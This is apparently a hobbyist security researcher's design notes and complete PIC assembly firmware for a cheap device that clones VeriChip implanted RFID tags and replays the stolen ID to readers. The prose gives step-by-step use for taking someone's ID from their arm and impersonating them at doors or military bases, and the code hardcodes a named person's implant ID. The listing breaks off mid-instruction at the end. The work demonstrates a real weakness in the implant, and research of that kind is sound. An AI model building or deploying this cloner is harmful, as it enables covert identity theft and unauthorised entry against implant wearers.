标签:
I have:
Please refer to the schematic.
It‘s important to remember that I designed this device for absolute minimum parts count and cost.
I therefore made some fairly disgusting tradeoffs. A lot of what I did is terrible design practice.
I had originally intended to use the PIC with an ER (external resistor) oscillator.
It‘s okay for the clock frequency to drift within a few percent, since the tag always synchronizes itself off the reader‘s clock.
It therefore seems like there‘s no reason to spend money on a crystal. This turns out not to be true, though.
The phase noise of the ER oscillator is terrible.
I ‘scoped the CLKOUT pin, with the oscillator running at 10 MHz (so CLKOUT is around 10/4 = 2.5 MHz),
and triggered off an edge of that square wave.
Using the delayed timebase, I looked at an edge about 100 us after the trigger point; it jitters over more than a period!
The frequency-selective antenna turns this phase noise into amplitude modulation, which raises the noise floor to a hopeless level.
I therefore cannot use the ER oscillator.
The INTRC oscillator is somewhat better, but does not divide well to produce 134 kHz (125 kHz or 143 kHz, large error).
This means that we need to use a crystal or a resonator; either will give good enough phase noise, and a resonator‘s cheaper.
I chose a 10 MHz ceramic resonator, for thirty-five cents.
The Verichip is designed to be read at 134 kHz, so we will divide our instruction clock by 19 to produce a 132 kHz carrier to transmit.
This isn‘t quite right, but it will be close enough.
When we are reading a legitimate Verichip (i.e., pretending to be a reader, to clone someone‘s implant),
the tag will derive its timing from the carrier that we transmit.
That means that it doesn‘t matter if we‘re a little bit off, because the tag will be off by that same amount.
When we are being read by a legitimate reader (i.e., pretending to be a tag, to pretend to be someone whose tag we‘ve already cloned),
we will derive our timing from the carrier that the reader transmits, which we measure through R9.
In `read‘ mode, we transmit the unmodulated carrier that powers the tag.
This means that we need a high-power output buffer to drive the antenna.
This is all very low-frequency, so a couple of general-purpose transistors (Q1, Q2) will do the job fine.
They are configured as emitter followers here, to buffer the carrier output by the PIC‘s GPIO pin.
The GPIO pin can only source or sink +/- 20 mA; the transistors that we are using are rated for 200 mA, although we won‘t run them quite that high.
The information-bearing signal returned from the tag appears in the voltage across C1,
but we first have to separate it out from the carrier that we are using to power the tag.
We do this with a peak detector, followed by a passive filter (D1, C3-5, R5-8).
This produces a signal that we interpret using the PIC‘s comparator.
I do this in a somewhat ugly way. The signal from the antenna is AC-coupled so that it has a mean of zero volts (with respect to ground).
I apply this to one input of the PIC‘s comparator; the other input of that comparator goes to ground, through the VREF module.
This means that I am applying an input voltage below Vss to the PIC, which is outside the recommended operation conditions.
It works very well, though. The only problem is if the signal from the tag gets very strong,
because the protection diodes will clamp it asymmetrically about ground, and move the decision point.
It‘s difficult to couple to the tag‘s antenna well enough for this to be a problem, so I‘m not very worried.
Since I don‘t know very much about the structure of the tag‘s ID,
it‘s difficult for me to come up with a good metric to determine whether I‘ve read a valid ID.
There is presumably a CRC or something, but I haven‘t bothered trying to figure it out;
I have only a very small number of tags to test against, so it would be difficult for me to test any theory that I might come up with.
Instead I just read the ID several times, and verify that it is the same each time.
The current firmware reads the ID once, and then checks it three times.
This is a parameter that you can play with; more verifications gives increased confidence in the ID,
but also makes it more likely that we will reject a valid read.
In `simulate‘ mode, we listen for a carrier from a reader, and change the load across the antenna in such a way as to transmit our ID.
We can change the load across the antenna by either driving or tri-stating RB3.
When we drive RB3 low, we short-circuit the coil through Q2.
When we tri-state RB3, it cannot supply any base current for either Q1 or Q2,
so no collector current flows, so the coil is open-circuited.
The only trick is that we must listen for the legitimate reader‘s incident carrier,
because that is what gives us our sense of time.
We do this through R9, once again using the PIC‘s comparator.
The resistor is necessary because the voltage at the antenna might be much larger than the PIC‘s Vdd = 4.5 V;
without the resistor, a very large current would flow through the protection diodes on that input pin and destroy the microcontroller.
R9 limits that current to a safe amount.
Some current does still flow through the protection diodes, though;
if R9 gets too small then we risk putting the PIC into latchup, which would be relatively bad.
Also, comparator 1 stops working if too much current flows into the substrate from RA0.
This is well outside the manufacturer‘s recommended operating conditions.
Without R6, the current through the coil would drop to zero when we tri-stated RB3,
which means that the current through C3 would drop to zero,
which means that the voltage across it would drop to zero and we would lose our sense of time.
As long as some current always flows, this isn‘t a problem.
The device has no on/off switch; this is achieved in software.
The PIC can be put to sleep (clock oscillator stopped, wake up on interrupt), dropping the micro‘s power consumption to almost nothing.
The LEDs must be turned off, and the coil must be driven low
(since the input buffer for RB3 might draw class A current if we float it, and R6 will draw current if we drive it high).
The PIC‘s comparators and VREF module should be turned off; o
therwise they burn about a hundred microamps.
With the software given below, battery standby life should be on the order of the shelf life of the cells.
To steal someone‘s Verichip: Press and release the white button.
The white light will turn on while we try to get a read. Hold the antenna very close to the bearer‘s arm;
if you know the orientation of the implanted tag, then try to hold your antenna parallel.
The green light will blink to indicate a successful read, and the cloner will exit `read mode.‘
Press the green button to exit `read‘ mode without a successful read.
To replay the ID to a reader: hold the antenna close to the Verichip reader.
Press and hold the green button until the door opens (or they bring you a drink, or they let you in to the army base, etc.).
The green light will turn on for as long as you hold down the green button.
The cloner looks like the cloned Verichip only while the green switch is depressed;
the reader won‘t see you unless you‘re holding it down.
If you‘ve got an ID that you would like to hold on to, then press the white button and then the green button,
and then release both (in either order). This will save the most recently-read ID to the PIC‘s non-volatile (EEPROM) memory.
The ID stored in EEPROM is loaded at power-on reset, so you can later recall this ID by removing and reinserting the batteries.
By default, the stored ID is Annalee Newitz‘s, number 47063.
The easiest way to archive an acquired ID (for later use, or to email to a friend, or whatever) is
to read out the PIC‘s EEPROM, using the in-circuit programming connector.
This can be saved as an IHEX file, or in any other format that your programming software supports.
When it comes time to reuse that ID, just program it into the PIC‘s EEPROM,
and it will be the first ID in memory after power-on reset.
The read range, when stealing someone‘s Verichip, is about an inch.
This isn‘t great, but probably enough to work with.
The official Verichip reader gives about four inches of read range, on axis and with fresh batteries.
I could presumably do as well or better, but that would require more than one IC,
and would therefore not be quite so cheap, or easy to build.
If anyone from Verichip makes an issue of this,
then I will design a `low-frequency range extension‘ board for my proxmark3, and see how far I can go.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; An ultra-simple Verichip cloner: we can behave either as a reader (to
;; get the ID of a legitimate tag), or as a simulated tag (to replay the
;; stored ID to a legitimate reader).
;;
;; The hardware is relatively stupid; I‘ve made every compromise I could
;; think of to get the parts count down.
;;
;; This code is for MPASM 5.05, probably works with other versions though.
;;
;; Jonathan Westhues, Sep 2006
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
#include <p16f628.inc>
radix dec
;; leave BODEN off to get the standby battery life up (want a few years,
;; comparable to shelf life of the alkaline AAA cells)
__config _CP_OFF & _HS_OSC & _PWRTE_ON & _WDT_OFF & _BODEN_OFF & _LVP_OFF
;; GPIO pin assignments on PORTA
#define PORTA_READER_OUTPUT 0
#define PORTA_CARRIER_SENSE 1
;; GPIO pin assignments on PORTB
#define PORTB_LED_GREEN 0
#define PORTB_LED_WHITE 1
#define PORTB_DIVIDER_POWER 2
#define PORTB_COIL_DRIVER 3
#define PORTB_SWITCH_WHITE 4
#define PORTB_SWITCH_GREEN 5
;; Convenience macros for btfss/btfsc; I find these quicker to read.
ifset macro port, bit
btfsc port, bit
endm
ifclear macro port, bit
btfss port, bit
endm
;; Wrapper macros to manipulate the two LEDs on the board. Used only for
;; user interface, nothing special.
WhiteLedOn macro
bcf PORTB, PORTB_LED_WHITE
endm
WhiteLedOff macro
bsf PORTB, PORTB_LED_WHITE
endm
GreenLedOn macro
bcf PORTB, PORTB_LED_GREEN
endm
GreenLedOff macro
bsf PORTB, PORTB_LED_GREEN
endm
;; Macros for time delays (cycle-counted busy waits). These are only
;; approximate.
DebounceWait macro label
movlw 60
movwf milliCount
label
Wait1Millisecond
decfsz milliCount, f
goto label
endm
Wait1Millisecond macro
clrf microCount
goto $ + 1
goto $ + 1
goto $ + 1
decfsz microCount, f
goto $ - 4
endm
;; Wrappers macros to manipulate the PWM peripheral (Timer2/CCP), used to
;; divide the micro clock down to produce the transmitted carrier in
;; `reader‘ mode. We will use (10 MHz)/(4*(18+1)) = 132 kHz, for ~2%
;; error vs. desired 134 kHz, good enough.
TurnOnPwmPeripheral macro
banksel PR2
movlw 18
movwf PR2 ^ 0x80
banksel CCPR1L
movlw 9 ; Pwm duty cycle 50%
movwf CCPR1L
movlw 0x0c ; Pwm mode, MSBs clear
movwf CCP1CON
bsf T2CON, 2 ; T2 on
endm
TurnOffPwmPeripheral macro
clrf CCP1CON
bcf T2CON, 2 ; T2 off
endm
;; Variables in Bank 0.
cblock 0x20
microCount
bitCount
cardId:64
milliCount
cycleCount
temp
iterCount
endc
org 0
Reset
goto Init
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; We get an interrupt whenever the user presses or releases a button with
;; interrupts on. The interrupt handler looks at the state of the pushbuttons,
;; and from this it jumps to the correct operating mode.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
org 4
Isr
bcf STATUS, RP0
bcf INTCON, RBIF
DebounceWait l12
ifclear PORTB, PORTB_SWITCH_GREEN
goto switchGreenPressed
ifclear PORTB, PORTB_SWITCH_WHITE
goto switchWhitePressed
;; so neither is pressed, so go to sleep
DebounceWait l6
goto SleepNSpin
;; White switch is for read mode. That mode is latched, and then exited with
;; a press of the green switch, so we must wait until they release the
;; white switch before entering that code.
switchWhitePressed
WhiteLedOn
DebounceWait l0
awaitReleaseWhite
ifclear PORTB, PORTB_SWITCH_GREEN
goto bothSwitchesPressed
ifclear PORTB, PORTB_SWITCH_WHITE
goto awaitReleaseWhite
DebounceWait l1
bcf INTCON, RBIF
bsf INTCON, GIE ;; can break us out by pressing any other button
goto GetIdFromCard
;; Green switch is for replay mode; that mode stays only as long as the
;; switch is held for, so jump straight in to that routine and let the edge
;; when the switch is released take us out.
switchGreenPressed
WhiteLedOff
GreenLedOn
DebounceWait l2
bcf INTCON, RBIF
bsf INTCON, GIE
goto TransmitCardId
;; Both switches means `load sample ID‘, in this case Annalee‘s. Then we
;; just wait for the button to be released, and go back to sleep.
bothSwitchesPressed
WhiteLedOn
GreenLedOn
DebounceWait l3
awaitReleaseBoth
ifclear PORTB, PORTB_SWITCH_WHITE
goto awaitReleaseBoth
ifclear PORTB, PORTB_SWITCH_GREEN
goto awaitReleaseBoth
DebounceWait l4
goto writeIdToEeprom
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Where we end up after power-on. Load either a fixed ID from program
;; memory, or the ID that we have stored in EEPROM, and then go to sleep.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Init
;; load the stored ID from flash, or the one from the table if there‘s
;; none in flash
bsf STATUS, RP0
clrf EEADR ^ 0x80
bsf EECON1 ^ 0x80, RD
movf EEDATA ^ 0x80, w
bcf STATUS, RP0
xorlw 0xff
ifset STATUS, Z
goto loadFixedId ; and this jumps to SleepNSpin when it‘s done
;; so there‘s a valid ID in there, somewhere; load it from flash
movlw cardId
movwf FSR
movlw 64
movwf bitCount
bsf STATUS, RP0
clrf EEADR ^ 0x80
bcf STATUS, RP0
loadIdFromFlash
bsf STATUS, RP0
bsf EECON1 ^ 0x80, RD
movf EEDATA ^ 0x80, w
incf EEADR ^ 0x80, f
bcf STATUS, RP0
movwf INDF
incf FSR, f
decfsz bitCount, f
goto loadIdFromFlash
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Go to sleep, and wait for an interrupt to wake us up. First we should power
;; down anything that might waste current, though.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
SleepNSpin
; Turn on the pull-ups, which we need to operate the switches.
banksel OPTION_REG
bcf OPTION_REG ^ 0x80, NOT_RBPU
; Switches are inputs, all others outputs on PORTB.
banksel TRISB
movlw 0x30
movwf TRISB ^ 0x80
; RA0 and RA1 are used as comparators, rest are unused, so drive them
; as outputs to avoid class A current in input buffers.
movlw 0x03
movwf TRISA ^ 0x80
banksel PORTB
clrf PORTA
; Configure comparators as off (since they draw 30 uA each, rather a
; lot of current).
movlw 0x00
movwf CMCON
; Configure voltage reference as off (since it also draws current)
banksel VRCON
movlw 0x00
movwf VRCON ^ 0x80
banksel PORTB
; Drive LEDs HIGH (off), coil driver LOW (don‘t waste current in R6),
; voltage divider LOW (don‘t waste current in that), programming pins
; (which are N/C in normal operation) LOW.
movlw 0x03
movwf PORTB
TurnOffPwmPeripheral
; ISR forces us out, so must turn on interrupts
bsf INTCON, RBIE
bcf INTCON, RBIF
bsf INTCON, GIE
asleep
sleep
goto asleep
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Routines to transmit an ID; basically we count incident carrier cycles
;; using the comparator on PORTA_CARRIER_SENSE, and from that we determine
;; our timing as we clock out the stored ID over and over.
;;
;; This routine does not return; it exits only as a result of an interrupt.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
TransmitCardId
; Set up Vref to ground, since the sensed carrier comes in AC-coupled
; about that point.
banksel VRCON
movlw 0xa0
movwf VRCON ^ 0x80
; Both comparators on, -inputs to RA0/RA1, +inputs to Vreg module
banksel CMCON
movlw 0x02
movwf CMCON
; Set the pin that drives the emitter followers LOW. The loop will touch
; only TRISB, not PORTB, so that pin will alternate between low impedance
; to ground and tri-state.
bcf PORTB, PORTB_COIL_DRIVER
spinTx
movlw 64
movwf bitCount
movlw cardId
movwf FSR
replayNibble
variable i = 0
while i < 4
;; First, we wait for 16 incident carrier cycles
movlw 16
movwf cycleCount
ifset CMCON, 7
goto $ - 1
ifclear CMCON, 7
goto $ - 1
decfsz cycleCount, f
goto $ - 5
;; Then, we set the coil driver pin according to the ID stored in memory.
bsf STATUS, RP0
bsf TRISB ^ 0x80, PORTB_COIL_DRIVER
ifclear INDF, i
bcf TRISB ^ 0x80, PORTB_COIL_DRIVER
bcf STATUS, RP0
variable i = i + 1
endw
incf FSR, f
decfsz bitCount, f
goto replayNibble
goto spinTx
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Routines to read the ID. We apply a ~134 kHz square wave to the coil driver
;; gates, using the PWM module to save ourselves the pain of counting
;; cycles. Then we wait for an edge after a long period of time, and we
;; assume that we just sync‘d on the ID so we receive it.
;;
;; This is prone to error, though, especially at startup, so we read the ID
;; again and compare it to the one that we recorded. If they don‘t match then
;; we throw the stored ID away and start over.
;;
;; This routine will return if it thinks that it has read an ID, or exit
;; due to an interrupt.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
GetIdFromCard
; Set up Vref to Vdd/2, since the sensed carrier comes in AC-coupled
; about that point.
banksel VRCON
movlw 0xa0
movwf VRCON ^ 0x80
; Both comparators on, -inputs to RA0/RA1, +inputs to Vreg module
banksel CMCON
movlw 0x02
movwf CMCON
; Let us minimize the substrate current injected through R9, by driving
; that pin as an output.
banksel TRISA
bcf TRISA ^ 0x80, 1
banksel PORTB
bcf PORTB, PORTB_COIL_DRIVER
TurnOnPwmPeripheral
; give the oscillator some time to settle (tuned circuit)
DebounceWait l8
spinRx
; First, wait for an edge (any edge; we will replay the ID cyclically,
; so it doesn‘t matter where in the ID we get bit-sync).
awaitEdgeHigh
ifclear CMCON, 6
goto awaitEdgeHigh
awaitEdgeLow
ifset CMCON, 6
goto awaitEdgeLow
; Now, delay a little while so that we will sample the bit at the centre
; of the bit time, not at the edge.
movlw 60
movwf microCount
spinToMiddle
decfsz microCount, f
goto spinToMiddle
; Set up the area of memory in which we will store the ID.
movlw cardId
movwf FSR
movlw 64
movwf bitCount
nextBit
; This loop is unrolled, to four iterations per jump; this is because
; we want to store 256 bits in 64 bytes, so we must use four iterations
variable i = 0
while i < 4
bcf INDF, i
ifset CMCON, 6
bsf INDF, i
GreenLedOn
GreenLedOff
movlw 98
movwf microCount
decfsz microCount, f
goto $ - 1
goto $ + 1
variable i = i + 1
endw
goto $ + 1
goto $ + 1
incf FSR, f
decfsz bitCount, f
goto nextBit
movlw 3
movwf iterCount
checkIdManyTimes
; Now we have the ID; but since we don‘t know how to check the CRC or
; anything like that, we need some way to determine whether we‘ve
; received a valid signal, or just noise. Do this by receiving the ID
; a second time.
movlw cardId
movwf FSR
movlw 64
movwf bitCount
nextBitCheck
; This loop is unrolled, to four iterations per jump; this is because
; we have stored 256 bits in 64 bytes. Check each bit to see that it
; is the same that we received last time.
variable i = 0
while i < 4
movlw 0
ifset CMCON, 6
movlw (1<<i)
xorwf INDF, w
movwf temp
ifset temp, i
goto spinRx
nop
movlw 97
movwf microCount
decfsz microCount, f
goto $ - 1
goto $ + 1
variable i = i + 1
endw
goto $ + 1
goto $ + 1
incf FSR, f
decfsz bitCount, f
goto nextBitCheck
decfsz iterCount, f
goto checkIdManyTimes
; We made it this far, so we got the same thing each time. For a further
; paranoia check, make sure that the signal could plausibly be the
; Manchester-type modulation that the Verichip uses.
movlw cardId
movwf FSR
movlw 64
movwf bitCount
manchesterCheck
movf INDF, w
andlw 0x0f
movwf temp
; so now temp = (cardId[64-bitCount] & 0x0f)
; sixteen possibilities, of which six can never happen:
; 0000 0001 0111 1000 1110 1111
movlw 0x00
xorwf temp, w
ifset STATUS, Z
goto spinRx
movlw 0x01
xorwf temp, w
ifset STATUS, Z
goto spinRx
movlw 0x07
xorwf temp, w
ifset STATUS, Z
goto spinRx
movlw 0x08
xorwf temp, w
ifset STATUS, Z
goto spinRx
movlw 0x0e
xorwf temp, w
ifset STATUS, Z
goto spinRx
movlw 0x0f
xorwf temp, w
ifset STATUS, Z
goto spinRx
decfsz bitCount, f
goto manchesterCheck
; If we made it this far, then the consistency check passed. Leave the
; ID stored in memory, blink the green LED to indicate success, and
; go back to sleep.
WhiteLedOff
movlw 5
movwf bitCount
blink
GreenLedOn
DebounceWait l7
DebounceWait l11
GreenLedOff
DebounceWait l9
DebounceWait l10
decfsz bitCount, f
goto blink
; If the two IDs agree, then it‘s probably a valid read, so we leave
; it stored in RAM and go to sleep.
goto SleepNSpin
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; In case someone has a Verichip reader but no chip to clone, they can
;; still do a demo by replaying a previously-cloned chip‘s ID. I read this
;; one with a proxmark3, and used `vchdemod clone‘ to store that in a
;; .tr file. A perl script converts the .tr file into a table that can be
;; included inline here.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
loadFixedId
;; this is #included in my build process, but it seemed easier to distribute
;; just one file so I‘ve cut-and-paste inlined it here
;; {{BEGIN CUT-AND-PASTED MATERIAL
; Autogenerated include by tr2asm.pl, from in.tr
movlw 3
movwf (cardId+0)
movlw 3
movwf (cardId+1)
movlw 3
movwf (cardId+2)
movlw 3
movwf (cardId+3)
movlw 3
movwf (cardId+4)
movlw 11
movwf (cardId+5)
movlw 10
movwf (cardId+6)
movlw 10
movwf (cardId+7)
movlw 10
movwf (cardId+8)
movlw 2
movwf (cardId+9)
movlw 5
movwf (cardId+10)
movlw 5
movwf (cardId+11)
movlw 5
movwf (cardId+12)
movlw 13
movwf (cardId+13)
movlw 12
movwf (cardId+14)
movlw 12
movwf (cardId+15)
movlw 12
movwf (cardId+16)
movlw 4
movwf (cardId+17)
movlw 3
movwf (cardId+18)
movlw 11
movwf (cardId+19)
movlw 10
movwf (cardId+20)
movlw 4
movwf (cardId+21)
movlw 13
movwf (cardId+22)
movlw 4
movwf (cardId+23)
movlw 5
movwf (cardId+24)
movlw 5
movwf (cardId+25)
movlw 5
movwf (cardId+26)
movlw 13
movwf (cardId+27)
movlw 10
movwf (cardId+28)
movlw 10
movwf (cardId+29)
movlw 10
movwf (cardId+30)
movlw 10
movwf (cardId+31)
movlw 4
movwf (cardId+32)
movlw 5
movwf (cardId+33)
movlw 5
movwf (cardId+34)
movlw 5
movwf (cardId+35)
movlw 13
movwf (cardId+36)
movlw 10
movwf (cardId+37)
movlw 10
movwf (cardId+38)
movlw 10
movwf (cardId+39)
movlw 10
movwf (cardId+40)
movlw 10
movwf (cardId+41)
movlw 12
movwf (cardId+42)
movlw 12
movwf (cardId+43)
movlw 2
movwf (cardId+44)
movlw 13
movwf (cardId+45)
movlw 12
movwf (cardId+46)
movlw 12
movwf (cardId+47)
movlw 4
movwf (cardId+48)
movlw 3
movwf (cardId+49)
movlw 13
movwf (cardId+50)
movlw 4
movwf (cardId+51)
movlw 5
movwf (cardId+52)
movlw 5
movwf (cardId+53)
movlw 5
movwf (cardId+54)
movlw 13
movwf (cardId+55)
movlw 10
movwf (cardId+56)
movlw 10
movwf (cardId+57)
movlw 10
movwf (cardId+58)
movlw 10
movwf (cardId+59)
movlw 4
movwf (cardId+60)
movlw 5
movwf (cardId+61)
movlw 5
movwf (cardId+62)
movlw 5
movwf (cardId+63)
;; END CUT-AND-PASTED MATERIAL}}
goto SleepNSpin
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Write the ID from RAM to flash; presumably this is one that we wish to
;; hold on to. That means that this ID will be loaded by default on power-
;; on reset, so we can always get it back, even if we clone other tags
;; later.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
writeIdToEeprom
movlw 64
movwf bitCount
movlw cardId
movwf FSR
bsf STATUS, RP0
clrf EEADR ^ 0x80
bcf STATUS, RP0
writeByteToEeprom
; load the byte to be written into W
movf INDF, w
bsf STATUS, RP0
; write W to EEADR
movwf EEDATA ^ 0x80
bsf EECON1 ^ 0x80, WREN
movlw 0x55
movwf EECON2 ^ 0x80
movlw 0xaa
movwf EECON2 ^ 0x80
bsf EECON1 ^ 0x80, WR
ifset EECON1 ^ 0x80, WR
goto $ - 1
; increment write position in EEPROM
incf EEADR ^ 0x80, f
bcf STATUS, RP0
; increment read position in RAM
incf FSR, f
decfsz bitCount, f
goto writeByteToEeprom
bsf